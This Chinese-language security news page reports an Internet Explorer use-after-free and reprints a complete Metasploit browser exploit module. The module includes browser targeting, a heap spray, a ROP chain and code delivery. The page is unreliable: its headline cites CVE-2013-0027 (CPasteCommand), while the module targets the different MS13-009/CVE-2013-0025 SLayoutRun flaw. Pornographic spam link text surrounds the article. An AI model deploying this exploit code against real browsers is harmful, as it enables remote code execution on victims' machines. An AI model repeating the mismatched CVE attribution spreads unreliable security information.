精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

高危漏洞CVE-2013-0027 EXP 影響IE所有版本

安全 漏洞
Microsoft Internet Explorer處理CPasteComma存在一個釋放后使用錯誤,允許構建惡意WEB頁,誘使用戶解析,可以應用程序上下文執行任意代碼。

Microsoft Internet Explorer處理CPasteComma存在一個釋放后使用錯誤,允許構建惡意WEB頁,誘使用戶解析,可以應用程序上下文執行任意代碼。CVE編號CVE-2013-0027,影響版本如下:

Microsoft Internet Explorer 10

Microsoft Internet Explorer 9

Microsoft Internet Explorer 8

Microsoft Internet Explorer 7

Microsoft Internet Explorer 6

在Metasploit已經發布相應的利用腳本,如下:

  1. ##  
  2. # This file is part of the Metasploit Framework and may be subject to  
  3. # redistribution and commercial restrictions. Please see the Metasploit  
  4. # Framework web site for more information on licensing and terms of use.  
  5. #   http://metasploit.com/framework/  
  6. ##  
  7.    
  8. require 'msf/core' 
  9.    
  10. class Metasploit3 < Msf::Exploit::Remote  
  11.     Rank = NormalRanking  
  12.    
  13.     include Msf::Exploit::Remote::HttpServer::HTML  
  14.     include Msf::Exploit::RopDb  
  15.    
  16.     def initialize(info={})  
  17.         super(update_info(info,  
  18.             'Name'           => "MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free",  
  19.             'Description'    => %q{  
  20.                 This module exploits a use-after-free vulnerability in Microsoft Internet Explorer  
  21.                 where a CParaElement node is released but a reference is still kept  
  22.                 in CDoc. This memory is reused when a CDoc relayout is performed.  
  23.             },  
  24.             'License'        => MSF_LICENSE,  
  25.             'Author'         =>  
  26.                 [  
  27.                     'Scott Bell <scott.bell@security-assessment.com>' # Vulnerability discovery & Metasploit module  
  28.                 ],  
  29.             'References'     =>  
  30.                 [  
  31.                     [ 'CVE''2013-0025' ],  
  32.                     [ 'MSB''MS13-009' ],  
  33.                     [ 'URL''http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf' ]  
  34.                 ],  
  35.             'Payload'     =>  
  36.                 {  
  37.                     'BadChars'       => "\x00",  
  38.                     'Space'          => 920,  
  39.                     'DisableNops'    => true,  
  40.                     'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500  
  41.                 },  
  42.             'DefaultOptions'  =>  
  43.                 {  
  44.                     'InitialAutoRunScript' => 'migrate -f' 
  45.                 },  
  46.             'Platform'    => 'win',  
  47.             'Targets'     =>  
  48.                 [  
  49.                     [ 'Automatic', {} ],  
  50.                     [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => 0x5f4 } ]  
  51.                 ],  
  52.             'Privileged'      => false,  
  53.             'DisclosureDate'  => "Feb 13 2013",  
  54.             'DefaultTarget'   => 0))  
  55.    
  56.         register_options(  
  57.             [  
  58.                 OptBool.new('OBFUSCATE', [false'Enable JavaScript obfuscation'false])  
  59.             ], self.class)  
  60.    
  61.     end  
  62.    
  63.     def get_target(agent)  
  64.         #If the user is already specified by the user, we'll just use that  
  65.         return target if target.name != 'Automatic' 
  66.    
  67.         nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' 
  68.         ie = agent.scan(/MSIE (\d)/).flatten[0] || '' 
  69.    
  70.         ie_name = "IE #{ie}" 
  71.    
  72.         case nt  
  73.         when '5.1' 
  74.             os_name = 'Windows XP SP3' 
  75.         end  
  76.    
  77.         targets.each do |t|  
  78.             if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))  
  79.                 print_status("Target selected as: #{t.name}")  
  80.                 return t  
  81.             end  
  82.         end  
  83.    
  84.         return nil  
  85.     end  
  86.    
  87.     def heap_spray(my_target, p)  
  88.         js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))  
  89.         js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))  
  90.    
  91.         js = %Q|  
  92.    
  93.             var heap_obj = new heapLib.ie(0x20000);  
  94.             var code = unescape("#{js_code}");  
  95.             var nops = unescape("#{js_nops}");  
  96.             while (nops.length < 0x80000) nops += nops;  
  97.             var offset = nops.substring(0, #{my_target['Offset']});  
  98.             var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);  
  99.             while (shellcode.length < 0x40000) shellcode += shellcode;  
  100.             var block = shellcode.substring(0, (0x80000-6)/2);  
  101.             heap_obj.gc();  
  102.             for (var i=1; i < 0x300; i++) {  
  103.                 heap_obj.alloc(block);  
  104.             }  
  105.             var overflow = nops.substring(0, 10);  
  106.    
  107.         |  
  108.    
  109.         js = heaplib(js, {:noobfu => true})  
  110.    
  111.         if datastore['OBFUSCATE']  
  112.             js = ::Rex::Exploitation::JSObfu.new(js)  
  113.             js.obfuscate  
  114.    
  115.         end  
  116.    
  117.         return js  
  118.     end  
  119.    
  120.     def get_payload(t, cli)  
  121.         code = payload.encoded  
  122.    
  123.         # No rop. Just return the payload.  
  124.         return code if t['Rop'].nil?  
  125.    
  126.         # ROP chain generated by mona.py - See corelan.be  
  127.         case t['Rop']  
  128.         when :msvcrt  
  129.             print_status("Using msvcrt ROP")  
  130.             rop_nops = [0x77c39f92].pack("V") * 11 # RETN  
  131.             rop_payload = generate_rop_payload('msvcrt'"", {'target'=>'xp'})  
  132.             rop_payload << rop_nops  
  133.             rop_payload << [0x77c364d5].pack("V") # POP EBP # RETN  
  134.             rop_payload << [0x77c15ed5].pack("V") # XCHG EAX, ESP # RETN  
  135.             rop_payload << [0x77c35459].pack("V") # PUSH ESP # RETN  
  136.             rop_payload << [0x77c39f92].pack("V") # RETN  
  137.             rop_payload << [0x0c0c0c8c].pack("V") # Shellcode offset  
  138.             rop_payload << code  
  139.         end  
  140.    
  141.         return rop_payload  
  142.     end  
  143.    
  144.     def get_exploit(my_target, cli)  
  145.         p  = get_payload(my_target, cli)  
  146.         js = heap_spray(my_target, p)  
  147.    
  148.         html = %Q|  
  149.         <!doctype html>  
  150.         <html>  
  151.         <head>  
  152.         <script>  
  153.         #{js}  
  154.         </script>  
  155.         <script>  
  156.         var data;  
  157.         var objArray = new Array(1150);  
  158.    
  159.         setTimeout(function(){  
  160.             document.body.style.whiteSpace = "pre-line";  
  161.    
  162.             CollectGarbage();  
  163.    
  164.             for (var i=0;i<1150;i++){  
  165.                 objArray[i] = document.createElement('div');  
  166.                 objArray[i].className = data += unescape("%u0c0c%u0c0c");  
  167.             }  
  168.    
  169.             setTimeout(function(){document.body.innerHTML = "boo"}, 100)  
  170.         }, 100)  
  171.    
  172.         </script>  
  173.         </head>  
  174.         <body>  
  175.         <p> </p>  
  176.         </body>  
  177.         </html>  
  178.         |  
  179.    
  180.         return html  
  181.     end  
  182.    
  183.     def on_request_uri(cli, request)  
  184.         agent = request.headers['User-Agent']  
  185.         uri   = request.uri  
  186.         print_status("Requesting: #{uri}")  
  187.    
  188.         my_target = get_target(agent)  
  189.         # Avoid the attack if no suitable target found  
  190.         if my_target.nil?  
  191.             print_error("Browser not supported, sending 404: #{agent}")  
  192.             send_not_found(cli)  
  193.             return 
  194.         end  
  195.    
  196.         html = get_exploit(my_target, cli)  
  197.         html = html.gsub(/^\t\t/, '')  
  198.         print_status "Sending HTML..." 
  199.         send_response(cli, html, {'Content-Type'=>'text/html'})  
  200.    
  201.     end  
  202.    
  203. end 

微軟安全補丁:https://technet.microsoft.com/en-us/security/bulletin/ms13-009

責任編輯:藍雨淚 來源: FreebuF
相關推薦

2014-11-14 10:24:24

2020-12-11 11:18:43

MiTMKubernetes漏洞

2014-04-29 11:18:27

2015-04-28 07:50:02

2021-11-01 11:59:56

Windows 操作系統漏洞

2015-07-13 09:18:20

2023-06-12 18:55:22

2013-05-06 15:15:23

2022-05-30 12:50:12

微軟Android漏洞

2023-04-04 22:20:53

2020-07-15 10:35:25

漏洞攻擊網絡安全

2016-03-22 12:37:45

Struts2Struts2漏洞漏洞檢測

2015-03-13 18:08:49

2025-03-19 12:57:06

2019-06-14 09:12:46

漏洞代碼攻擊

2017-05-27 10:22:37

2022-12-09 14:32:53

2025-09-16 08:57:44

2013-03-28 11:10:11

2025-09-24 13:49:44

點贊
收藏

51CTO技術棧公眾號

国产日韩综合一区二区性色av| 日韩电影大片中文字幕| 亚洲第一综合网站| 少妇一区二区三区四区| 日韩国产高清影视| 久久久精品国产亚洲| 欧美双性人妖o0| 成人网ww555视频免费看| 亚洲黄色录像片| 久久免费视频1| 国产乱码精品一区二三区蜜臂| 国产日韩1区| www亚洲欧美| 五月婷婷综合在线观看| 日本99精品| 欧美三片在线视频观看| 少妇人妻无码专区视频| 成人av毛片| 成人av在线一区二区| 国产极品jizzhd欧美| 久久国产在线观看| 国产精品久久久久久久久妇女| 亚洲第一在线视频| 婷婷激情5月天| 桃花岛成人影院| 婷婷成人综合网| 国产免费xxx| 日本高清中文字幕在线| 久久先锋资源网| 国产主播一区二区三区四区| 999久久久久| 麻豆久久一区二区| 国产精品久久久久久网站| 日韩精品一区二区三区国语自制| 68国产成人综合久久精品| 亚洲午夜激情免费视频| 六十路息与子猛烈交尾| 一区二区三区四区视频免费观看| 精品污污网站免费看| 黄色片一级视频| 碰碰在线视频| 精品国产户外野外| 可以在线看的av网站| 在线电影福利片| 亚洲欧美日韩国产综合| 自拍偷拍亚洲色图欧美| 麻豆最新免费在线视频| 国产日韩欧美激情| 日本一区二区在线视频| 国内在线精品| 国产午夜精品一区二区三区四区| 久久艳妇乳肉豪妇荡乳av| 无码精品人妻一区二区三区影院| 成人精品在线视频观看| 国产精品一区二区欧美黑人喷潮水| av免费在线观看不卡| 国产一区二区免费看| 成人性生交大片免费看视频直播| 97久久人国产精品婷婷| 精品一区二区三区免费观看| 成人国内精品久久久久一区| 国产一区二区自拍视频| 奇米影视一区二区三区| 成人激情视频免费在线| a在线观看视频| 福利一区二区在线观看| 国产精品一区二区三区四区五区| 欧美性受xxxx狂喷水| k8久久久一区二区三区| 欧美激情论坛| 午夜视频在线观看免费视频| 亚洲人成网站在线| 日本大片免费看| 伊人色综合一区二区三区影院视频| 一本大道久久a久久综合婷婷| 日日摸日日碰夜夜爽av| 88xx成人网| 欧美一卡二卡在线| 国产一级黄色录像| 成人vr资源| 免费91麻豆精品国产自产在线观看| 欧美黑人猛猛猛| 国产日韩欧美一区| 国产精品综合久久久| av在线免费在线观看| av电影天堂一区二区在线| 欧美午夜视频在线| 成人三级网址| 黑丝美女久久久| 中文字幕成人免费视频| 超碰成人97| 国产一区二区三区18| 动漫性做爰视频| 亚洲影音一区| 亚洲自拍偷拍在线| 欧美日韩影视| 亚洲一区二区三区四区中文字幕| 99精品视频播放| 日韩精品一区二区三区免费视频| 日韩电影中文字幕| 国产精品精品软件男同| 国产精品一二| 亚洲va久久久噜噜噜久久天堂| 黄色一级大片在线免费看国产一 | 久久精品人人| 亚洲伊人久久大香线蕉av| 四虎在线免费看| 一区二区久久久| 91视频免费版污| 9l亚洲国产成人精品一区二三| 国产亚洲精品久久久久久牛牛| 久久久久性色av无码一区二区| 日韩精品免费专区| 国产亚洲精品久久飘花| 国产一区久久精品| 色久综合一二码| 国产精品无码一区二区三| 亚洲澳门在线| 国产精品视频大全| 色视频免费在线观看| 亚洲国产aⅴ天堂久久| 久久久久xxxx| 首页国产精品| 国产精品日日做人人爱| 黄网站在线观看| 黄色成人在线免费| 国产大尺度视频| 欧美99久久| 成人在线中文字幕| 9色在线观看| 在线视频一区二区免费| 少妇精品一区二区| 亚洲综合三区| 黄色国产精品一区二区三区| 欧美xxxxhdvideosex| 欧美一区二区三区在| 在线视频这里只有精品| 麻豆久久一区二区| 亚洲精品中文字幕在线| 久久久人成影片一区二区三区在哪下载| 亚洲а∨天堂久久精品喷水| 久久久综合久久久| 国产成人福利片| 国产黄色激情视频| 亚洲va欧美va人人爽成人影院| 久久人人爽人人爽人人片亚洲| 一级片视频免费| 中文字幕欧美激情| www.国产视频.com| 外国成人免费视频| 97人人澡人人爽| 另类视频在线| 日韩电影第一页| 日韩美一区二区| 国产精品视频观看| 尤物国产在线观看| 一区二区影院| 成人午夜影院在线观看| 忘忧草在线影院两性视频| 亚洲精品视频免费| 男人天堂av在线播放| 欧美激情在线观看视频免费| 亚洲欧美日本一区二区| 欧美成人嫩草网站| 精品乱码一区| 欧美韩国亚洲| 九九热这里只有精品免费看| 亚洲风情第一页| 五月婷婷综合网| 一级肉体全黄裸片| 国产精品一区二区在线观看网站| 日韩精品综合在线| 免费视频亚洲| 国产精品一久久香蕉国产线看观看| 免费在线看a| 欧美mv和日韩mv国产网站| 成人毛片18女人毛片| 日本一区二区久久| 性生活一级大片| 精品999日本| 色综合影院在线观看| 秋霞午夜一区二区三区视频| 欧美中文在线观看国产| 麻豆传媒视频在线观看| 精品国产三级电影在线观看| 懂色av蜜臀av粉嫩av分享吧最新章节| 国产精品免费av| 国产精品入口麻豆| 免费看欧美美女黄的网站| 国产黄色激情视频| 欧美日韩国产高清电影| 国产99视频精品免费视频36| free欧美| 韩国三级日本三级少妇99| 在线观看黄av| 日韩福利在线播放| 国产农村老头老太视频| 欧美日韩在线另类| 欧美激情图片小说| 国产喷白浆一区二区三区| 国产精品一区二区在线免费观看| 天堂精品中文字幕在线| 成年人网站国产| 欧美gayvideo| 欧美中日韩一区二区三区| 深夜激情久久| 成人网中文字幕| 亚州一区二区三区| 性欧美办公室18xxxxhd| 91麻豆一二三四在线| 在线精品播放av| 视频午夜在线| 精品国产sm最大网站免费看| 国产老女人乱淫免费| 91黄视频在线| 91视频免费网址| 亚洲国产精品一区二区久久恐怖片 | 国产精品久一| 国产国语刺激对白av不卡| 超碰在线cao| 久久99久国产精品黄毛片入口| 91精彩在线视频| 亚洲日本欧美日韩高观看| 特黄视频在线观看| 日韩精品一区二区在线| 国产精品永久久久久久久久久| 欧美在线观看18| 波多野结衣黄色网址| 黑人狂躁日本妞一区二区三区| 久久一区二区三| 一区二区理论电影在线观看| 91嫩草丨国产丨精品| 国产精品国产三级国产三级人妇 | 国产精品无码在线| 成人激情视频网站| 日本天堂在线播放| 国产成人av电影免费在线观看| 一级日本黄色片| 国产一区在线观看视频| 亚洲精品成人在线播放| 国产尤物一区二区在线| 在线免费观看av网| 国产精品一区二区在线观看不卡| 手机在线国产视频| 国产在线观看免费一区| 午夜影院免费观看视频| 国产福利一区二区三区视频在线| 成人三级做爰av| 东方欧美亚洲色图在线| 精品1卡二卡三卡四卡老狼| av电影在线观看一区| 免费在线观看成年人视频| 久久综合成人精品亚洲另类欧美| 人妻精品久久久久中文字幕 | 亚洲激情在线观看| 黄色美女一级片| 亚洲精品一区二区三区婷婷月| 深夜福利免费在线观看| 国产一区二区三区视频在线观看| 97视频在线观看网站| 最好看的2019的中文字幕视频| 麻豆视频在线观看免费| 美女精品视频一区| 99riav视频在线观看| 欧美最猛性xxxxx免费| 粉嫩一区二区三区| 国产日韩精品在线| 日韩精品视频在线看| 久久久福利视频| 日韩久久久久| 日韩精品久久一区二区| 免费精品视频| 视频免费1区二区三区| 懂色av一区二区夜夜嗨| 国产亚洲无码精品| 国产精品网站在线| 九九精品在线观看视频| 黑人巨大精品欧美一区二区一视频| 中文字幕一区二区人妻痴汉电车| 欧美一区二区三区免费视频| 少妇高潮一区二区三区69| 国产亚洲成av人片在线观看桃| 精产国品自在线www| 国自在线精品视频| 久久精品黄色| 精品一区二区三区日本| 久久综合电影| 91九色在线观看视频| 久久99国产精品尤物| 国产三级视频网站| 亚洲激情图片qvod| 中文字幕在线观看视频免费| 日韩欧美精品在线| 国产在线观看高清视频| 欧美高跟鞋交xxxxhd| yy6080久久伦理一区二区| 国产66精品久久久久999小说| 国产亚洲电影| 大伊香蕉精品视频在线| 麻豆国产精品视频| 亚洲国产精品自拍视频| 亚洲婷婷综合色高清在线| 国产黄网在线观看| 精品不卡在线视频| 日本在线观看免费| 青青精品视频播放| 粉嫩av一区二区| 中国一区二区三区| 日本va欧美va精品发布| 一区二区视频观看| 亚洲一卡二卡三卡四卡无卡久久| 国产九色91回来了| 精品五月天久久| 国产三线在线| 97夜夜澡人人双人人人喊| 日韩一区二区三区免费播放| 成年人视频观看| 成人性视频免费网站| 色欲一区二区三区精品a片| 日本道色综合久久| 欧美69xxxxx| 欧美一级片免费在线| 国产成人福利av| av动漫在线播放| 国产在线国偷精品免费看| 日本黄区免费视频观看| 欧美中文字幕一二三区视频| 四虎永久在线精品免费网址| 欧美激情女人20p| a级日韩大片| 91网站在线观看免费| 国产精品综合网| www.99re7| 日韩区在线观看| 亚洲综合影视| 亚洲综合色激情五月| 一区二区在线影院| 中文字幕人妻无码系列第三区| 国产精品不卡在线观看| 在线中文字幕网站| 日日狠狠久久偷偷四色综合免费 | 三级网站视频在在线播放| 91亚洲精品在线观看| 亚洲成人国产| 交换做爰国语对白| 亚洲一区二区三区四区在线| 精品人妻少妇AV无码专区| 蜜月aⅴ免费一区二区三区 | 品久久久久久久久久96高清| 三级影片在线观看欧美日韩一区二区| 亚洲午夜福利在线观看| 在线一区二区三区四区五区| 成人p站proumb入口| 成人网页在线免费观看| 欧美a级一区| 天堂www中文在线资源| 天天av天天翘天天综合网色鬼国产| 天天操天天干天天爱| 91福利视频网| 欧美亚洲国产激情| 色噜噜狠狠一区二区| 亚洲日本在线天堂| 丰满人妻一区二区| 欧美亚洲午夜视频在线观看| 国产伦精品一区二区三区视频 | 伊人久久大香伊蕉在人线观看热v| 在线免费观看成人| 粉嫩高潮美女一区二区三区| 国产黄色片免费看| 尤物tv国产一区| 国产日韩欧美中文在线| 农民人伦一区二区三区| 久久久精品tv| 国产熟女一区二区丰满| 97精品国产97久久久久久春色| 久草成人资源| 黑人巨大猛交丰满少妇| 欧美日韩黄色大片| 免费观看在线黄色网| 高清免费日韩| 日本欧美大码aⅴ在线播放| 麻豆精品一区二区三区视频| 日韩成人xxxx| 四虎影视成人精品国库在线观看 | 国产成人精品一区二区三区在线| 亚洲天堂第一区| 国产日韩影视精品| 精品毛片一区二区三区| 国产成人精品亚洲精品| 国产精品videosex极品| 黄色片网站免费| 精品成人一区二区| 日韩三区四区| 无码aⅴ精品一区二区三区浪潮| 亚洲欧洲日韩在线| 亚洲 欧美 激情 另类| 91亚洲午夜在线| 日韩精品一二三| 日本特黄特色aaa大片免费| www.日韩.com|